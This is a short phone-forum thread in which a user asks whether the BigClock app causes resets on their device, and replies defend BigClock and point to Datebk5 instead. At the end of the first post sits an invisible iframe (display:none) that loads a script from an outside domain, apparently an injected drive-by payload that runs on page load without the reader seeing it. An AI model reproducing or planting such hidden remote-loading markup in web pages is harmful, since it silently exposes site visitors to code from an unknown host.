+ Reply to Thread

Problems with Bigclock?

My phone is experiencing what is slowly becoming commonplace on this board, a few soft resets a day, an occasional contrast issue and a spontaneous hard reset about once a week. The third party apps I have now are few:

1. Datebk5 (don't use alarms or icons)
    2. Bejewelled!
    3. Slap
    4. BigClock
    5. Happy Days

I used to use Zlauncher, but I have a feeling it may use up battery power and be a reason for some of my phone issues.

Based on what I have read on this board it seems that more often than not, apps that utilize alarms seem to be the culprits behind the hard and soft resets. So of the five third party apps I have remaining, I suspect that BigClock is the phone causing the problems.

Has anyone else had trouble with Big Clock, or am I just unlucky?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

3_D
    I'm running Bigclock v2.83 with no problems so far!

I've been running Big Clock for months. And although I've had my share of resets, I don't think Big Clock is the culprit. The suspicious app in your list is Datebook5.

I've been running Datebk5 (using icons and alarms) & I can't remember the last time I had a reset that I didn't initiate myself. BigClock is on my system but I haven't been using it because I couldn't figure out how to make it vibrate the phone (which is virtually always set to silent mode). With Datebk5, using a hidden category, I set up daily alarms which work great for me and do vibrate.